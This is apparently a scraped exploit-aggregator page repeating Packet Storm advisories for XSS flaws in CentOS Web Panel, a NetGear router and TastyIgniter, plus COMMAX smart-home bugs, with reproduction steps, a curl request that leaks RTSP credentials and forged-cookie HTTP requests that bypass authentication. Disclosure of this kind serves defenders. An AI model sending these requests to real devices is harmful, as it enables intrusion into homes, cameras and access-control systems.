Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
CentOS Web Panel 0.9.8.1081 Cross Site Scripting
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
CentOS Web Panel version 0.9.8.1081 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
CentOS Web Panel 0.9.8.1081 Cross Site Scripting
https://3.bp.blogspot.com/-_lYy5AwzHPI/WWlvAVk_lrI/AAAAAAAAIKU/HsTDdKCabVkkHkFsXQw08U72hOmjap5rACLcBGAs/s1600/h121.png
CentOS Web Panel version 0.9.8.1081 suffers from a persistent cross site scripting vulnerability.
MD5 |
ff51ac25f304d0ad4ba7b11aefc45408Download
# Exploit Title: CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS)
# Date: 13/08/2021
# Exploit Author: Dinesh Mohanty
# Vendor Homepage: http://centos-webpanel.com
# Software Link: http://centos-webpanel.com
# Version: v0.9.8.1081
# Tested on: CentOS 7 and 8
# Description:
Multiple Stored Cross Site Scripting (Stored XSS) Vulnerability is found in the Short Name, Ip Origin, Key Code, Format Request and Owner fields within the admin api page of module of CentOS/ Control WebPanel when user tries to create a new API. This is because the application does not properly sanitize users input.
# Steps to Reproduce:
1. Login into the CentOS Web Panel using admin credential.
2. From Navigation Click on "API Manager" -> then Click on "Allow New API Access"
3. In the above given fields give payload as: x and provide other details and click on "Create"
4. Now one can see that the XSS Payload executed.
#Vendor Notification
18th Aug 2021 - Vendor has been notified
18th Aug 2021 - Vendor confirmed the issue and fixed for next version
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Firebase PHP-JWT Algorithm Confusion
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Firebase's PHP-JWT suffers from an algorithm confusion issue. Proof of concept code included.
MD5 |
Download
Source:packetstormsecurity.com
Firebase PHP-JWT Algorithm Confusion
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Firebase's PHP-JWT suffers from an algorithm confusion issue. Proof of concept code included.
MD5 |
4c84fb0fba2f42d4741760b2e2b2764cDownload
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
NetGear D1500 1.0.0.21_1.0.1PE Cross Site Scripting
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
NetGear D1500 version 1.0.0.21_1.0.1PE suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
NetGear D1500 1.0.0.21_1.0.1PE Cross Site Scripting
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
NetGear D1500 version 1.0.0.21_1.0.1PE suffers from a persistent cross site scripting vulnerability.
MD5 |
6a5d2c9fd89ba2dd746c2e39160e4fd3Download
# Exploit Title: NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS)
# Date: 21 Dec 2018
# Exploit Author: Securityium
# Vendor Homepage: https://www.netgear.com/
# Version: V1.0.0.21_1.0.1PE
# Tested on: NetGear D1500 Home Router
# Contact: assessors@securityium.com
Version :
Hardware version: D1500-100PES-A
Firmware Version : V1.0.0.21_1.0.1PE
Step to Reproduce Video: https://www.youtube.com/watch?v=JcRYxH93E5E
Tested Network: Local LAN
SSID Details:
Attacker SSID :
For routers admin
3) Logged in as admin.
2) Go to Advanced --> Advanced Setup --> Wireless Repeating Function
3) Enable Wireless Repeating Function
4) click on check.
wait for the checking scan to finish and display the surrounding networks list.
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
COMMAX Smart Home Ruvie CCTV Bridge suffers from a credential disclosure vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credential Disclosure
https://2.bp.blogspot.com/-ZkI_NEmJcds/WWlvjl_lr_I/AAAAAAAAIQo/28S1w7dyZRc0PebCQs4RPEz7Silw5ZbpgCLcBGAs/s1600/h95.png
COMMAX Smart Home Ruvie CCTV Bridge suffers from a credential disclosure vulnerability.
MD5 |
0d5d3a5130f6133e1e168518382d87aaDownload
COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: n/a
Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment
complex that provides advanced life values and safety.
Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker
to disclose RTSP credentials in plain-text.
Tested on: GoAhead-Webs
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5665
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php
02.08.2021
--
$ curl http://TARGET:8086/overview.asp
Infomation
* [2021/08/15 09:56:46] Started
* MAX USER : 32
* DVR Lists
[1] rtsp://admin:s3cr3tP@$$w0rd@10.0.0.17:554/Streaming/Channels/2:554
$ curl http://TARGET:8086/login_check.js:
var server_ip = $(location).attr('host');
var server_domain = server_ip.replace(":8086", "");
document.domain = server_domain;
var cookiesAuth = $.cookie("cookiesAuth");
if (cookiesAuth != "authok") {
parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
}
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
TastyIgniter 3.0.7 Cross Site Scripting
https://4.bp.blogspot.com/-zX4owX_f6gA/WWlvEjBsFTI/AAAAAAAAILA/L-jpFLkKi_AyIykovxrESAdO3HPxIIp7QCLcBGAs/s1600/h132.png
TastyIgniter version 3.0.7 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
TastyIgniter 3.0.7 Cross Site Scripting
https://4.bp.blogspot.com/-zX4owX_f6gA/WWlvEjBsFTI/AAAAAAAAILA/L-jpFLkKi_AyIykovxrESAdO3HPxIIp7QCLcBGAs/s1600/h132.png
TastyIgniter version 3.0.7 suffers from a persistent cross site scripting vulnerability.
MD5 |
60b4b39b8239a5951ee136da0b3b1117Download
# Exploit Title: XSS-Stored on TastyIgniter 3.0.7 Vulnerable parameter
Customer[first_name] on /customers/create
# Author: nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 08.13.2021
# Vendor: https://tastyigniter.com/
# Link:https://tastyigniter.com/download
# CVE: CVE-2021-38699
[+] Exploit Source:
# Vulnerability Assessment
XSS-Stored Allow 48 characters
# Url
http://192.168.1.3/setup-master/admin/customers/create
# Payload
# Vulnerable parameter
Customer[first_name]
----------------------------------------------------------------------------------------
# Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-38699
# Proof: https://streamable.com/i6lzfc
# BR nu11secur1ty
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://www.exploit-db.com/
https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http:
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png
COMMAX Biometric Access Control System version 1.0.0 suffers from a authentication bypass vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
https://3.bp.blogspot.com/-S3Qyj_CQLZk/WWlvO05KSCI/AAAAAAAAIM0/1UOPsv562Y4pHjCru7b9m-kScCR1bHauwCLcBGAs/s1600/h27.png
COMMAX Biometric Access Control System version 1.0.0 suffers from a authentication bypass vulnerability.
MD5 |
30872997d53a89ccd87660764948a6b3Download
COMMAX Biometric Access Control System 1.0.0 Authentication Bypass
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0
Summary: Biometric access control system.
Desc: The application suffers from an authentication bypass vulnerability.
An unauthenticated attacker through cookie poisoning can bypass authentication
and disclose sensitive information and circumvent physical controls in smart
homes and buildings.
Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5661
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php
02.08.2021
--
The following request with Cookie forging bypasses authentication and lists available SQL backups.
GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/user_add.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
Connection: close
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Tue, 03 Aug 1984 14:07:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 10316
::: COMMAX :::
...
...
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
COMMAX Biometric Access Control System version 1.0.0 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
COMMAX Biometric Access Control System 1.0.0 Cross Site Scripting
https://1.bp.blogspot.com/-vtYXiq7PjFk/WWlvT3pSItI/AAAAAAAAIN4/S7SZq03xxCsAAYdYEaQwiY4Z64tRJ_WvQCLcBGAs/s1600/h43.png
COMMAX Biometric Access Control System version 1.0.0 suffers from a cross site scripting vulnerability.
MD5 |
7bf5f2cdb78f902a98c85a7c700aacd6Download
COMMAX Biometric Access Control System 1.0.0 Cookie Reflected XSS
Vendor: COMMAX Co., Ltd.
Prodcut web page: https://www.commax.com
Affected version: 1.0.0
Summary: Biometric access control system.
Desc: The application is vulnerable to an unauthenticated reflected
cross-site scripting (XSS) vulnerability. Input passed to the Cookies
'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM' is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary
HTML and JS code in a user's browser session in context of an affected
site.
Tested on: nginx/1.14.0 (Ubuntu)
MariaDB/10.3.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5660
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5660.php
02.08.2021
--
GET /db_dump.php HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: UA/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=lab">; CMX_ADMIN_LV=8; CMX_COMPLEX_NM=ZSL">; CMX_COMPLEX_IP=2.5.1.0
Connection: close
Source:packetstormsecurity.com
DEF CON 29 - Rex Guo, Junyuan Zeng - Phantom Attack: Evading System Call Monitoring
https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/
<!-- SC_OFF -->https://www.youtube.com/watch?v=yaAdM8pWKG8&ab_channel=DEFCONConference <!-- SC_ON --> submitted by /u/rexguo1 (https://www.reddit.com/user/rexguo1)
[link] (https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/) [comments] (https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/)
https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/
<!-- SC_OFF -->https://www.youtube.com/watch?v=yaAdM8pWKG8&ab_channel=DEFCONConference <!-- SC_ON --> submitted by /u/rexguo1 (https://www.reddit.com/user/rexguo1)
[link] (https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/) [comments] (https://www.reddit.com/r/redteamsec/comments/p5i7lk/def_con_29_rex_guo_junyuan_zeng_phantom_attack/)